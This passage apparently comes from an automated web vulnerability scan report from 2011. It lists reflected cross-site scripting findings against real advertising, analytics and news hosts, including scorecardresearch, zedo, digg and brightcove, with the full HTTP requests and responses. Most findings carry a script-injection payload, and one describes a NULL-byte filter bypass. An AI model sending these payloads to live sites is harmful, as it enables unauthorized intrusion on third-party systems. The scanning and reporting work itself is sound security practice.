The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b8f5c<script>alert(1)</script>26c563a3d19 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=b8f5c<script>alert(1)</script>26c563a3d19&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"b8f5c<script>alert(1)</script>26c563a3d19", c15:"", c16:"", r:""});

3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3f055<script>alert(1)</script>215fffaf43b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15=3f055<script>alert(1)</script>215fffaf43b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
RE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"3f055<script>alert(1)</script>215fffaf43b", c16:"", r:""});

3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 302ec<script>alert(1)</script>901d717b8ca was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693302ec<script>alert(1)</script>901d717b8ca&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693302ec<script>alert(1)</script>901d717b8ca", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d7c1e<script>alert(1)</script>9d9537f6b13 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1d7c1e<script>alert(1)</script>9d9537f6b13&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1d7c1e<script>alert(1)</script>9d9537f6b13", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 41993<script>alert(1)</script>fc7d8b09653 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F41993<script>alert(1)</script>fc7d8b09653&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/41993<script>alert(1)</script>fc7d8b09653", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 56553<script>alert(1)</script>e3dfef08947 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=56553<script>alert(1)</script>e3dfef08947&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"56553<script>alert(1)</script>e3dfef08947", c6:"", c10:"", c15:"", c16:"", r:""});

3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d95cf<script>alert(1)</script>677d9af4a8c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=d95cf<script>alert(1)</script>677d9af4a8c&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"d95cf<script>alert(1)</script>677d9af4a8c", c10:"", c15:"", c16:"", r:""});

3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d3a"><script>alert(1)</script>32285faa682 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23d3a\"><script>alert(1)</script>32285faa682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dm/index.php/23d3a"><script>alert(1)</script>32285faa682 HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<a href="http://blog.harbottle.com/dm/index.php/23d3a\"><script>alert(1)</script>32285faa682?paged=2">
...[SNIP]...

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.ulf-wendel.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b78"><script>alert(1)</script>06485f2279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45b78\"><script>alert(1)</script>06485f2279d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?45b78"><script>alert(1)</script>06485f2279d=1 HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://blog.ulf-wendel.de/?45b78\"><script>alert(1)</script>06485f2279d=1&paged=2">
...[SNIP]...

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload d2555<script>alert(1)</script>79d6c0d4362 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 532
Origin: http://blogs.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Qa39efb8859c99888a16c5b96b94383131a9ffbbe
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:02 GMT
Server:
Content-Length: 3570

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3. ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId type.mediaDTO
..Bjz... ..ivideoPlayerd2555<script>alert(1)</script>79d6c0d4362..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.26. http://cdn.krxd.net/config/ [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.krxd.net
Path:	/config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload b16f3<script>alert(1)</script>76bb110beda was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=cnbc.comb16f3<script>alert(1)</script>76bb110beda&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=10601 t=1315321012024997
X-Served-By: logger-b011.krxd.net
Content-Length: 91
Date: Tue, 06 Sep 2011 14:56:52 GMT
Connection: close

{"error": "Non existant site for NBCU - cnbc.comb16f3<script>alert(1)</script>76bb110beda"}

3.27. http://content.plymedia.com/initialize [video parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.plymedia.com
Path:	/initialize

Issue detail

The value of the video request parameter is copied into an XML comment. The payload cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 was submitted in the video parameter. This input was echoed as cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /initialize?video=cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:15:32 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:32 GMT
Content-Length: 599
Connection: keep-alive

<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222]--><!--9/6/2011
...[SNIP]...

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdf7'-alert(1)-'8a1211d7b4b was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/lar/v11-001/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aa06'-alert(1)-'af6ec576df9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

3.30. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003355b"><script>alert(1)</script>0a3916a9e29 was submitted in the REST URL parameter 1. This input was echoed as 3355b"><script>alert(1)</script>0a3916a9e29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%003355b"><script>alert(1)</script>0a3916a9e29 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19408553 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14406

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003355b"><script>alert(1)</script>0a3916a9e29.rss">
...[SNIP]...

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The value of the dc request parameter is copied into an HTML comment. The payload 2e67c--><a%20b%3dc>c97d7ad58db was submitted in the dc parameter. This input was echoed as 2e67c--><a b=c>c97d7ad58db in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pls/web_prod-plq-dad/db_pages.getCourseDesc?dc=D70302_13531452e67c--><a%20b%3dc>c97d7ad58db HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
